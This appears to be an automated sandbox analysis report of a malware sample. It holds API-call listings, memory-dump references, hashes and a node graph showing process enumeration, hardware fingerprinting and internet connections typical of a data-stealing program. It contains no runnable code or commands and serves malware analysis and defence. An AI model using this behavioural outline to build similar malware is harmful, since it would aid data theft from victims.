                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA), ref: 001B39AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 0019D1CC
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00196B3D
                                                                                                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?), ref: 00196B62
                                                                                                                                                                                                                              • Part of subcall function 0019AD9B: RaiseException.KERNEL32(E06D7363,00000001,00000003,00191365,?,?,?,?,00191365,?,001C0B30), ref: 0019ADFB
                                                                                                                                                                                                                              • Part of subcall function 0019DD93: IsProcessorFeaturePresent.KERNEL32(00000017,0019F12B,?,?,?,?,00000000,001A08D9,?,?,?), ref: 0019DDAF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                            • Opcode ID: 9d9b905d4541bcef728b0a9a14bcb7da6c701aa8d5268635deb8d015bde5a344
                                                                                                                                                                                                                            • Instruction ID: b38639acfb360cb389c408dd6f724249d5c1afab3c51b8014ee1a60b1359d178
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9b905d4541bcef728b0a9a14bcb7da6c701aa8d5268635deb8d015bde5a344
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321AF32E00218EBCF24DFE5D945AAEB7B9FF14710F59041DE40AAB650D734AD45CBA1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00191762
                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019179A
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 001988DF
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 00198903
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                            • Opcode ID: 0df7849ff7cfebbcd5dbbdb2b207093ca5df9a34e17bcaecbb4e3a8357520024
                                                                                                                                                                                                                            • Instruction ID: 8c400f80431aa8970872495b4f9b5934a25b1fbbd73f80e5053ba9b03ae17468
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0df7849ff7cfebbcd5dbbdb2b207093ca5df9a34e17bcaecbb4e3a8357520024
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF03A72919B409E8334DFBA9481443FBE4BE293113908E2FE0DEC3A11D730E404CB6A
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(0022437C,00224E80,00224EAC,?,00195625,00224EAC,00000000,00191C44), ref: 001993D6
                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(0022437C,?,00195625,00224EAC,00000000,00191C44), ref: 00199410
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                            • String ID: |C"
                                                                                                                                                                                                                            • API String ID: 17069307-2896041220
                                                                                                                                                                                                                            • Opcode ID: eb08651ef4e4da64151814d3c5c8df09ecb9096a80a1a973595a24ec834c7bf7
                                                                                                                                                                                                                            • Instruction ID: fe499e36c65f86bab9425d7a9c7fbe9fe5728fca4708045a0cd5c08291643ab4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb08651ef4e4da64151814d3c5c8df09ecb9096a80a1a973595a24ec834c7bf7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7F0A734100101DFCB20BF6DE884965BB78FB46771F20036EE955836E0C7341983CA21

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:5.2%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:2.9%
                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                            Total number of Limit Nodes:28
74493 403374 74492->74493 74494 4047e8 3 API calls 74493->74494 74495 40338a 74494->74495 74496 4047e8 3 API calls 74495->74496 74497 4033a1 74496->74497 74498 4047e8 3 API calls 74497->74498 74499 4033b8 74498->74499 74500 4047e8 3 API calls 74499->74500 74501 4033cf 74500->74501 74502 4047e8 3 API calls 74501->74502 74503 4033e6 74502->74503 74504 4047e8 3 API calls 74503->74504 74505 4033fd 74504->74505 74506 4047e8 3 API calls 74505->74506 74507 403414 74506->74507 74508 4047e8 3 API calls 74507->74508 74509 40342e 74508->74509 74510 4047e8 3 API calls 74509->74510 74511 403445 74510->74511 74512 4047e8 3 API calls 74511->74512 74513 40345c 74512->74513 74514 4047e8 3 API calls 74513->74514 74515 403473 74514->74515 74516 4047e8 3 API calls 74515->74516 74517 40348a 74516->74517 74518 4047e8 3 API calls 74517->74518 74519 4034a1 74518->74519 74520 4047e8 3 API calls 74519->74520 74521 4034b8 74520->74521 74522 4047e8 3 API calls 74521->74522 74523 4034cf 74522->74523 74524 4047e8 3 API calls 74523->74524 74525 4034e9 74524->74525 74526 4047e8 3 API calls 74525->74526 74527 403500 74526->74527 74528 4047e8 3 API calls 74527->74528 74529 403517 74528->74529 74530 4047e8 3 API calls 74529->74530 74531 40352e 74530->74531 74532 4047e8 3 API calls 74531->74532 74533 403545 74532->74533 74534 4047e8 3 API calls 74533->74534 74535 40355c 74534->74535 74536 4047e8 3 API calls 74535->74536 74537 403573 74536->74537 74538 4047e8 3 API calls 74537->74538 74539 40358a 74538->74539 74540 4047e8 3 API calls 74539->74540 74541 4035a4 74540->74541 74542 4047e8 3 API calls 74541->74542 74543 4035bb 74542->74543 74544 4047e8 3 API calls 74543->74544 74545 4035d2 74544->74545 74546 4047e8 3 API calls 74545->74546 74547 4035e9 74546->74547 74548 4047e8 3 API calls 74547->74548 74549 403600 74548->74549 74550 4047e8 3 API calls 74549->74550 74551 403617 74550->74551 74552 4047e8 3 API calls 74551->74552 74553 40362d 74552->74553 74554 4047e8 3 API calls 74553->74554 74555 403643 
74554->74555 74556 4047e8 3 API calls 74555->74556 74557 40365d 74556->74557 74558 4047e8 3 API calls 74557->74558 74559 403674 74558->74559 74560 4047e8 3 API calls 74559->74560 74561 40368b 74560->74561 74562 4047e8 3 API calls 74561->74562 74563 4036a1 74562->74563 74564 4047e8 3 API calls 74563->74564 74565 4036b8 74564->74565 74566 4047e8 3 API calls 74565->74566 74567 4036cf 74566->74567 74568 4047e8 3 API calls 74567->74568 74569 4036e3 74568->74569 74570 4047e8 3 API calls 74569->74570 74571 4036f9 74570->74571 74572 4047e8 3 API calls 74571->74572 74573 403713 74572->74573 74574 4047e8 3 API calls 74573->74574 74575 40372a 74574->74575 74576 4047e8 3 API calls 74575->74576 74577 403741 74576->74577 74578 4047e8 3 API calls 74577->74578 74579 403758 74578->74579 74580 4047e8 3 API calls 74579->74580 74581 40376f 74580->74581 74582 4047e8 3 API calls 74581->74582 74583 403786 74582->74583 74584 4047e8 3 API calls 74583->74584 74585 40379a 74584->74585 74586 4047e8 3 API calls 74585->74586 74587 4037b1 74586->74587 74588 4047e8 3 API calls 74587->74588 74589 4037cb 74588->74589 74590 4047e8 3 API calls 74589->74590 74591 4037e2 74590->74591 74592 4047e8 3 API calls 74591->74592 74593 4037f6 74592->74593 74594 4047e8 3 API calls 74593->74594 74595 40380a 74594->74595 74596 4047e8 3 API calls 74595->74596 74597 403821 74596->74597 74598 4047e8 3 API calls 74597->74598 74599 403838 74598->74599 74600 4047e8 3 API calls 74599->74600 74601 40384f 74600->74601 74602 4047e8 3 API calls 74601->74602 74603 403866 74602->74603 74604 4047e8 3 API calls 74603->74604 74605 403880 74604->74605 74606 4047e8 3 API calls 74605->74606 74607 403897 74606->74607 74608 4047e8 3 API calls 74607->74608 74609 4038ae 74608->74609 74610 4047e8 3 API calls 74609->74610 74611 4038c5 74610->74611 74612 4047e8 3 API calls 74611->74612 74613 4038db 74612->74613 74614 4047e8 3 API calls 74613->74614 74615 4038f2 74614->74615 74616 4047e8 3 API calls 74615->74616 74617 403906 74616->74617 
74618 4047e8 3 API calls 74617->74618 74619 40391d 74618->74619 74620 4047e8 3 API calls 74619->74620 74621 403937 74620->74621 74622 4047e8 3 API calls 74621->74622 74623 40394e 74622->74623 74624 4047e8 3 API calls 74623->74624 74625 403965 74624->74625 74626 4047e8 3 API calls 74625->74626 74627 40397c 74626->74627 74628 4047e8 3 API calls 74627->74628 74629 403993 74628->74629 74630 4047e8 3 API calls 74629->74630 74631 4039aa 74630->74631 74632 4047e8 3 API calls 74631->74632 74633 4039c1 74632->74633 74634 4047e8 3 API calls 74633->74634 74635 4039d8 74634->74635 74636 4047e8 3 API calls 74635->74636 74637 4039f2 74636->74637 74638 4047e8 3 API calls 74637->74638 74639 403a09 74638->74639 74640 4047e8 3 API calls 74639->74640 74641 403a20 74640->74641 74642 4047e8 3 API calls 74641->74642 74643 403a37 74642->74643 74644 4047e8 3 API calls 74643->74644 74645 403a4e 74644->74645 74646 4047e8 3 API calls 74645->74646 74647 403a65 74646->74647 74648 4047e8 3 API calls 74647->74648 74649 403a7c 74648->74649 74650 4047e8 3 API calls 74649->74650 74651 403a90 74650->74651 74652 4047e8 3 API calls 74651->74652 74653 403aaa 74652->74653 74654 4047e8 3 API calls 74653->74654 74655 403ac1 74654->74655 74656 4047e8 3 API calls 74655->74656 74657 403ad7 74656->74657 74658 4047e8 3 API calls 74657->74658 74659 403aee 74658->74659 74660 4047e8 3 API calls 74659->74660 74661 403b05 74660->74661 74662 4047e8 3 API calls 74661->74662 74663 403b1c 74662->74663 74664 4047e8 3 API calls 74663->74664 74665 403b33 74664->74665 74666 4047e8 3 API calls 74665->74666 74667 403b4a 74666->74667 74668 4047e8 3 API calls 74667->74668 74669 403b61 74668->74669 74670 4047e8 3 API calls 74669->74670 74671 403b75 74670->74671 74672 4047e8 3 API calls 74671->74672 74673 403b8c 74672->74673 74674 4047e8 3 API calls 74673->74674 74675 403ba3 74674->74675 74676 4047e8 3 API calls 74675->74676 74677 403bba 74676->74677 74678 4047e8 3 API calls 74677->74678 74679 403bd1 74678->74679 74680 4047e8 3 
API calls 74679->74680 74681 403be8 74680->74681 74682 4047e8 3 API calls 74681->74682 74683 403bff 74682->74683 74684 4047e8 3 API calls 74683->74684 74685 403c19 74684->74685 74686 4047e8 3 API calls 74685->74686 74687 403c30 74686->74687 74688 4047e8 3 API calls 74687->74688 74689 403c47 74688->74689 74690 4047e8 3 API calls 74689->74690 74691 403c5e 74690->74691 74692 4047e8 3 API calls 74691->74692 74693 403c75 74692->74693 74694 4047e8 3 API calls 74693->74694 74695 403c8c 74694->74695 74696 4047e8 3 API calls 74695->74696 74697 403ca3 74696->74697 74698 4047e8 3 API calls 74697->74698 74699 403cb7 74698->74699 74700 4047e8 3 API calls 74699->74700 74701 403cd1 74700->74701 74702 4047e8 3 API calls 74701->74702 74703 403ce8 74702->74703 74704 4047e8 3 API calls 74703->74704 74705 403cff 74704->74705 74706 4047e8 3 API calls 74705->74706 74707 403d16 74706->74707 74708 4047e8 3 API calls 74707->74708 74709 403d2c 74708->74709 74710 4047e8 3 API calls 74709->74710 74711 403d43 74710->74711 74712 4047e8 3 API calls 74711->74712 74713 403d57 74712->74713 74714 4047e8 3 API calls 74713->74714 74715 403d6e 74714->74715 74716 4047e8 3 API calls 74715->74716 74717 403d85 74716->74717 74718 4047e8 3 API calls 74717->74718 74719 403d9c 74718->74719 74720 4047e8 3 API calls 74719->74720 74721 403db3 74720->74721 74722 4047e8 3 API calls 74721->74722 74723 403dca 74722->74723 74724 4047e8 3 API calls 74723->74724 74725 403de1 74724->74725 74726 4047e8 3 API calls 74725->74726 74727 403df8 74726->74727 74728 4047e8 3 API calls 74727->74728 74729 403e0f 74728->74729 74730 4047e8 3 API calls 74729->74730 74731 403e26 74730->74731 74732 4047e8 3 API calls 74731->74732 74733 403e40 74732->74733 74734 4047e8 3 API calls 74733->74734 74735 403e57 74734->74735 74736 4047e8 3 API calls 74735->74736 74737 403e6e 74736->74737 74738 4047e8 3 API calls 74737->74738 74739 403e84 74738->74739 74740 4047e8 3 API calls 74739->74740 74741 403e9b 74740->74741 74742 4047e8 3 API calls 
74741->74742 74743 403eb2 74742->74743 74744 4047e8 3 API calls 74743->74744 74745 403ec9 74744->74745 74746 4047e8 3 API calls 74745->74746 74747 403ee0 74746->74747 74748 4047e8 3 API calls 74747->74748 74749 403efa 74748->74749 74750 4047e8 3 API calls 74749->74750 74751 403f10 74750->74751 74752 4047e8 3 API calls 74751->74752 74753 403f27 74752->74753 74754 4047e8 3 API calls 74753->74754 74755 403f3e 74754->74755 74756 4047e8 3 API calls 74755->74756 74757 403f55 74756->74757 74758 4047e8 3 API calls 74757->74758 74759 403f6c 74758->74759 74760 4047e8 3 API calls 74759->74760 74761 403f80 74760->74761 74762 4047e8 3 API calls 74761->74762 74763 403f97 74762->74763 74764 4047e8 3 API calls 74763->74764 74765 403fb1 74764->74765 74766 4047e8 3 API calls 74765->74766 74767 403fc7 74766->74767 74768 4047e8 3 API calls 74767->74768 74769 403fde 74768->74769 74770 4047e8 3 API calls 74769->74770 74771 403ff2 74770->74771 74772 4047e8 3 API calls 74771->74772 74773 404009 74772->74773 74774 4047e8 3 API calls 74773->74774 74775 404020 74774->74775 74776 4047e8 3 API calls 74775->74776 74777 404037 74776->74777 74778 4047e8 3 API calls 74777->74778 74779 40404e 74778->74779 74780 4047e8 3 API calls 74779->74780 74781 404067 74780->74781 74782 4047e8 3 API calls 74781->74782 74783 40407e 74782->74783 74784 4047e8 3 API calls 74783->74784 74785 404094 74784->74785 74786 4047e8 3 API calls 74785->74786 74787 4040a8 74786->74787 74788 4047e8 3 API calls 74787->74788 74789 4040bf 74788->74789 74790 4047e8 3 API calls 74789->74790 74791 4040d6 74790->74791 74792 4047e8 3 API calls 74791->74792 74793 4040ed 74792->74793 74794 4047e8 3 API calls 74793->74794 74795 404104 74794->74795 74796 4047e8 3 API calls 74795->74796 74797 40411e 74796->74797 74798 4047e8 3 API calls 74797->74798 74799 404135 74798->74799 74800 4047e8 3 API calls 74799->74800 74801 40414c 74800->74801 74802 4047e8 3 API calls 74801->74802 74803 404163 74802->74803 74804 4047e8 3 API calls 74803->74804 
74805 404179 74804->74805 74806 4047e8 3 API calls 74805->74806 74807 40418d 74806->74807 74808 4047e8 3 API calls 74807->74808 74809 4041a1 74808->74809 74810 4047e8 3 API calls 74809->74810 74811 4041b8 74810->74811 74812 4047e8 3 API calls 74811->74812 74813 4041d2 74812->74813 74814 4047e8 3 API calls 74813->74814 74815 4041e8 74814->74815 74816 4047e8 3 API calls 74815->74816 74817 4041ff 74816->74817 74818 4047e8 3 API calls 74817->74818 74819 404216 74818->74819 74820 4047e8 3 API calls 74819->74820 74821 40422d 74820->74821 74822 4047e8 3 API calls 74821->74822 74823 404244 74822->74823 74824 4047e8 3 API calls 74823->74824 74825 404258 74824->74825 74826 4047e8 3 API calls 74825->74826 74827 40426e 74826->74827 74828 4047e8 3 API calls 74827->74828 74829 404288 74828->74829 74830 4047e8 3 API calls 74829->74830 74831 40429f 74830->74831 74832 4047e8 3 API calls 74831->74832 74833 4042b6 74832->74833 74834 4047e8 3 API calls 74833->74834 74835 4042cc 74834->74835 74836 4047e8 3 API calls 74835->74836 74837 4042e3 74836->74837 74838 4047e8 3 API calls 74837->74838 74839 4042fa 74838->74839 74840 4047e8 3 API calls 74839->74840 74841 404311 74840->74841 74842 4047e8 3 API calls 74841->74842 74843 404325 74842->74843 74844 4047e8 3 API calls 74843->74844 74845 40433c 74844->74845 74846 4047e8 3 API calls 74845->74846 74847 404353 74846->74847 74848 4047e8 3 API calls 74847->74848 74849 40436a 74848->74849 74850 4047e8 3 API calls 74849->74850 74851 404381 74850->74851 74852 4047e8 3 API calls 74851->74852 74853 404395 74852->74853 74854 4047e8 3 API calls 74853->74854 74855 4043ac 74854->74855 74856 4047e8 3 API calls 74855->74856 74857 4043c3 74856->74857 74858 4047e8 3 API calls 74857->74858 74859 4043da 74858->74859 74860 4047e8 3 API calls 74859->74860 74861 4043f1 74860->74861 74862 4047e8 3 API calls 74861->74862 74863 404408 74862->74863 74864 4047e8 3 API calls 74863->74864 74865 40441c 74864->74865 74866 4047e8 3 API calls 74865->74866 74867 404433 
74866->74867 74868 4047e8 3 API calls 74867->74868 74869 40444a 74868->74869 74870 4047e8 3 API calls 74869->74870 74871 40445e 74870->74871 74872 4047e8 3 API calls 74871->74872 74873 404472 74872->74873 74874 4047e8 3 API calls 74873->74874 74875 404486 74874->74875 74876 4047e8 3 API calls 74875->74876 74877 4044a0 74876->74877 74878 4047e8 3 API calls 74877->74878 74879 4044b7 74878->74879 74880 4047e8 3 API calls 74879->74880 74881 4044cd 74880->74881 74882 4047e8 3 API calls 74881->74882 74883 4044e4 74882->74883 74884 4047e8 3 API calls 74883->74884 74885 4044fa 74884->74885 74886 4047e8 3 API calls 74885->74886 74887 404511 74886->74887 74888 4047e8 3 API calls 74887->74888 74889 404528 74888->74889 74890 4047e8 3 API calls 74889->74890 74891 40453e 74890->74891 74892 4047e8 3 API calls 74891->74892 74893 404558 74892->74893 74894 4047e8 3 API calls 74893->74894 74895 40456f 74894->74895 74896 4047e8 3 API calls 74895->74896 74897 404586 74896->74897 74898 4047e8 3 API calls 74897->74898 74899 40459d 74898->74899 74900 4047e8 3 API calls 74899->74900 74901 4045b4 74900->74901 74902 4047e8 3 API calls 74901->74902 74903 4045cb 74902->74903 74904 4047e8 3 API calls 74903->74904 74905 4045e2 74904->74905 74906 4047e8 3 API calls 74905->74906 74907 4045f9 74906->74907 74908 4047e8 3 API calls 74907->74908 74909 404612 74908->74909 74910 4047e8 3 API calls 74909->74910 74911 404629 74910->74911 74912 4047e8 3 API calls 74911->74912 74913 404642 74912->74913 74914 4047e8 3 API calls 74913->74914 74915 404656 74914->74915 74916 4047e8 3 API calls 74915->74916 74917 40466d 74916->74917 74918 4047e8 3 API calls 74917->74918 74919 404684 74918->74919 74920 4047e8 3 API calls 74919->74920 74921 40469b 74920->74921 74922 4047e8 3 API calls 74921->74922 74923 4046b2 74922->74923 74924 4047e8 3 API calls 74923->74924 74925 4046cc 74924->74925 74926 4047e8 3 API calls 74925->74926 74927 4046e3 74926->74927 74928 4047e8 3 API calls 74927->74928 74929 4046f9 74928->74929 
74930 4047e8 3 API calls 74929->74930 74931 404710 74930->74931 74932 4047e8 3 API calls 74931->74932 74933 404727 74932->74933 74934 4047e8 3 API calls 74933->74934 74935 40473d 74934->74935 74936 4047e8 3 API calls 74935->74936 74937 404754 74936->74937 74938 4047e8 3 API calls 74937->74938 74939 404768 74938->74939 74940 4047e8 3 API calls 74939->74940 74941 404781 74940->74941 74942 4047e8 3 API calls 74941->74942 74943 404797 74942->74943 74944 4047e8 3 API calls 74943->74944 74945 4047ae 74944->74945 74946 4047e8 3 API calls 74945->74946 74947 4047c5 74946->74947 74948 4047e8 3 API calls 74947->74948 74949 4047dc 74948->74949 74949->73957 76254 42f159 74950->76254 74952 412563 CreateToolhelp32Snapshot Process32First 74953 4125c4 CloseHandle 74952->74953 74954 412597 Process32Next 74952->74954 76255 42f1b5 74953->76255 74954->74953 74956 4125a9 StrCmpCA 74954->74956 74956->74954 74958 4125bb 74956->74958 74958->74954 74960 4104bc lstrcpyA 74959->74960 74961 411c3c 74960->74961 74962 4104bc lstrcpyA 74961->74962 74963 411c4a GetSystemTime 74962->74963 74964 411c66 74963->74964 74965 41d05a __setlocale_nolock 5 API calls 74964->74965 74966 411c9d 74965->74966 74966->73964 74968 4105b6 74967->74968 74969 4105da 74968->74969 74970 4105c8 lstrcpyA lstrcatA 74968->74970 74969->73979 74970->74969 74972 4104ee lstrcpyA 74971->74972 74973 401d07 74972->74973 74974 4104ee lstrcpyA 74973->74974 74975 401d12 74974->74975 74976 4104ee lstrcpyA 74975->74976 74977 401d1d 74976->74977 74978 4104ee lstrcpyA 74977->74978 74979 401d34 74978->74979 74980 4169f8 74979->74980 74981 41051e 2 API calls 74980->74981 74982 416a2e 74981->74982 74983 41051e 2 API calls 74982->74983 74984 416a3b 74983->74984 74985 41051e 2 API calls 74984->74985 74986 416a48 74985->74986 74987 4104bc lstrcpyA 74986->74987 74988 416a55 74987->74988 74989 4104bc lstrcpyA 74988->74989 74990 416a62 74989->74990 74991 4104bc lstrcpyA 74990->74991 74992 416a6f 74991->74992 74993 4104bc lstrcpyA 74992->74993 
74994 416a7c 74993->74994 74995 4104bc lstrcpyA 74994->74995 74996 416a89 74995->74996 74997 4104bc lstrcpyA 74996->74997 75053 416a96 74997->75053 75000 416ada StrCmpCA 75001 416b33 StrCmpCA 75000->75001 75000->75053 75002 416d16 75001->75002 75001->75053 75005 410562 lstrcpyA 75002->75005 75006 416d21 75005->75006 75008 4104bc lstrcpyA 75006->75008 75009 416d2e 75008->75009 75011 410562 lstrcpyA 75009->75011 75010 401cfd lstrcpyA 75010->75053 75014 416c6e 75011->75014 75012 416880 28 API calls 75012->75053 75013 416908 33 API calls 75013->75053 75015 4104bc lstrcpyA 75014->75015 75016 416d4d 75015->75016 75017 410562 lstrcpyA 75016->75017 75019 416d57 75017->75019 75018 416b93 StrCmpCA 75020 416bec StrCmpCA 75018->75020 75018->75053 76267 416de4 75019->76267 75022 416c02 StrCmpCA 75020->75022 75023 416ce5 75020->75023 75025 416cb4 75022->75025 75026 416c18 StrCmpCA 75022->75026 75024 410562 lstrcpyA 75023->75024 75030 416cf0 75024->75030 75028 410562 lstrcpyA 75025->75028 75031 416c80 75026->75031 75032 416c2a StrCmpCA 75026->75032 75027 4104ee lstrcpyA 75027->75053 75033 416cbf 75028->75033 75035 4104bc lstrcpyA 75030->75035 75034 410562 lstrcpyA 75031->75034 75036 416c4c 75032->75036 75037 416c3c Sleep 75032->75037 75039 4104bc lstrcpyA 75033->75039 75040 416c8b 75034->75040 75041 416cfd 75035->75041 75038 410562 lstrcpyA 75036->75038 75037->75053 75043 416c57 75038->75043 75044 416ccc 75039->75044 75045 4104bc lstrcpyA 75040->75045 75042 410562 lstrcpyA 75041->75042 75042->75014 75046 4104bc lstrcpyA 75043->75046 75047 410562 lstrcpyA 75044->75047 75048 416c98 75045->75048 75049 416c64 75046->75049 75047->75014 75050 410562 lstrcpyA 75048->75050 75051 410562 lstrcpyA 75049->75051 75050->75014 75051->75014 75052 410562 lstrcpyA 75052->75053 75053->75000 75053->75001 75053->75010 75053->75012 75053->75013 75053->75018 75053->75020 75053->75027 75053->75052 76258 4029f8 75053->76258 76261 402a09 75053->76261 76264 402a1a 75053->76264 76274 402a2b lstrcpyA 
75053->76274 76275 402a3c lstrcpyA 75053->76275 76276 402a4d lstrcpyA 75053->76276 75054 416d6a 75054->73991 75056 410562 lstrcpyA 75055->75056 75057 418299 75056->75057 75058 410562 lstrcpyA 75057->75058 75059 4182a4 75058->75059 75060 410562 lstrcpyA 75059->75060 75061 4182af 75060->75061 75061->73994 75063 4104fe 75062->75063 75064 410513 75063->75064 75065 41050b lstrcpyA 75063->75065 75064->74007 75065->75064 75067 4109b4 75066->75067 75068 4109bb GetVolumeInformationA 75066->75068 75067->75068 75069 410a22 75068->75069 75069->75069 75070 410a37 GetProcessHeap HeapAlloc 75069->75070 75071 410a61 wsprintfA lstrcatA 75070->75071 75072 410a52 75070->75072 76277 411659 GetCurrentHwProfileA 75071->76277 75073 4104bc lstrcpyA 75072->75073 75075 410a5a 75073->75075 75079 41d05a __setlocale_nolock 5 API calls 75075->75079 75076 410a9c lstrlenA 76293 4123aa lstrcpyA malloc strncpy 75076->76293 75078 410abf lstrcatA 75081 410ad6 75078->75081 75080 410b03 75079->75080 75080->74034 75082 4104bc lstrcpyA 75081->75082 75083 410aed 75082->75083 75083->75075 75085 4104ee lstrcpyA 75084->75085 75086 404b59 75085->75086 76297 404ab6 75086->76297 75088 404b65 75089 4104bc lstrcpyA 75088->75089 75090 404b81 75089->75090 75091 4104bc lstrcpyA 75090->75091 75092 404b91 75091->75092 75093 4104bc lstrcpyA 75092->75093 75094 404ba1 75093->75094 75095 4104bc lstrcpyA 75094->75095 75096 404bb1 75095->75096 75097 4104bc lstrcpyA 75096->75097 75098 404bc1 InternetOpenA StrCmpCA 75097->75098 75099 404bf5 75098->75099 75100 405194 InternetCloseHandle 75099->75100 75101 411c1f 7 API calls 75099->75101 75111 4051e1 75100->75111 75102 404c15 75101->75102 75103 41059c 2 API calls 75102->75103 75104 404c28 75103->75104 75105 410562 lstrcpyA 75104->75105 75106 404c33 75105->75106 75107 4105de 3 API calls 75106->75107 75108 404c5f 75107->75108 75109 410562 lstrcpyA 75108->75109 75110 404c6a 75109->75110 75112 4105de 3 API calls 75110->75112 75113 41d05a __setlocale_nolock 5 API calls 75111->75113 
